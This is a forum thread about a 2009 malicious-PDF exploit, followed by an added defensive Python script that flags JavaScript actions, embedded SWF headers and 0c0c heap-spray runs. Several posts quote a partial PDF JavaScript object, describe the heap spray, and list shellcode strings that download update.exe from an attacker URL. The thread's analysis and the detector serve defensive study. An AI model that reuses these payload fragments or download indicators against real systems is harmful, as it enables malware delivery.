Ability score:
( LV2,RANK:10 )
Post #2
I'm a total newbie and really don't know what this thing means. Could some expert explain? Is it garbled?
Post #3
Going to take a look...
Post #4
Why can't I find this link on the home page? Is it an internal link?
Post #5
Writing large amounts of 0c0c onto the stack eventually causes a memory access error, which triggers the SEH stack overflow.
Post #6
I think the real reason it was removed is that this PoC is not the 0-day from the 22nd; the latest one should be an swf file embedded in a PDF. Of course, it can't be ruled out that Adobe was unhappy :))
This is actually an old getIcon exploit.
In the shellcode:
URLMON.DLL, URLDownloadToFileA, update.exe, crash.php, http://viorfjoj-2.com/2/update.php?id=0
But http://viorfjoj-2.com seems to be down already.
Post #7
41.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 5 0 R
>>
/XObject <<
>>
>>
endobj
6 0 obj
<<
/Names [(HUYAKJS) 7 0 R ]
>>
endobj
7 0 obj
<<
/S /JavaScript
/JS (eval\(
Is this part of the code??
Post #8
Is the full exploit code for this vulnerability available? I'd like to study it. Preferably already decoded.
Post #9
I really don't understand this.
Post #10
This is where vulnerabilities come from...
Post #11
[QUOTE=dayang;661527]41.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF...[/QUOTE]
No. It contains two swf file fragments starting with FWS. It drops the file SUCHOST.EXE.
Post #12
Does the expert above have a sample?
Post #13
It's always that svchost.exe shellcode......
Post #14
Refer to this article to learn more about the vulnerability; it can be identified by the jump address and the shellcode:
http://www.avertlabs.com/research/blog/index.php/2009/07/22/new-0-day-attacks-using-pdf-documents/
Search online for the sample; it should be findable by now.
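A defender-side triage script for the three indicators the thread mentions (a /JavaScript action, embedded swf fragments starting with FWS, and 0c0c heap-spray runs), written as an added example that is not code from any poster; the SAMPLE_PDF bytes are constructed for the demonstration and are not a real sample.

```python
import re
import struct

# Constructed sample (not a real-world file): a /JavaScript action whose
# string sprays %u0c0c, a stream carrying an uncompressed SWF header, and a
# raw run of 0x0c0c0c0c dwords.
SAMPLE_PDF = (
    b"%PDF-1.4\n6 0 obj\n<<\n/Names [(HUYAKJS) 7 0 R ]\n>>\nendobj\n"
    b"7 0 obj\n<<\n/S /JavaScript\n/JS (eval(unescape(\""
    + b"%u0c0c" * 8 + b"\")))\n>>\nendobj\n"
    b"8 0 obj\n<< /Length 40 >>\nstream\n"
    + b"FWS\x0a" + struct.pack("<I", 40) + b"\x00" * 32
    + b"\nendstream\nendobj\n" + b"\x0c\x0c\x0c\x0c" * 8 + b"%%EOF\n"
)

def find_javascript_actions(data: bytes) -> list:
    """Offsets of PDF JavaScript action dictionaries (/S /JavaScript)."""
    return [m.start() for m in re.finditer(rb"/S\s*/JavaScript\b", data)]

def find_swf_headers(data: bytes) -> list:
    """Embedded SWF headers as (offset, magic, version, declared_len, plausible).

    The 8-byte SWF header is magic, version and little-endian uncompressed
    length. An uncompressed FWS body must fit in the remaining bytes; a
    compressed CWS/ZWS body may legitimately declare more than is present."""
    hits = []
    for m in re.finditer(rb"[FCZ]WS", data):
        off = m.start()
        if off + 8 > len(data):
            continue
        version = data[off + 3]
        length = struct.unpack_from("<I", data, off + 4)[0]
        plausible = 1 <= version <= 40 and length >= 8
        if data[off:off + 3] == b"FWS":
            plausible = plausible and length <= len(data) - off
        hits.append((off, data[off:off + 3].decode(), version, length, plausible))
    return hits

def find_heap_spray(data: bytes, min_dwords: int = 4) -> list:
    """(offset, run_length) of 0x0c0c0c0c runs, raw or as %u0c0c in JavaScript."""
    raw = rb"(?:\x0c\x0c\x0c\x0c){%d,}" % min_dwords
    text = rb"(?:%%u0c0c){%d,}" % (2 * min_dwords)
    return [(m.start(), m.end() - m.start()) for m in re.finditer(raw + rb"|" + text, data)]

def triage(data: bytes) -> dict:
    """Summarise the three indicators discussed in this thread for one PDF."""
    return {"javascript": find_javascript_actions(data),
            "swf": find_swf_headers(data),
            "spray": find_heap_spray(data)}
```

Running `triage(SAMPLE_PDF)` flags one JavaScript action, one plausible FWS header (version 10, 40 bytes) and two spray runs; a clean document yields empty lists for all three.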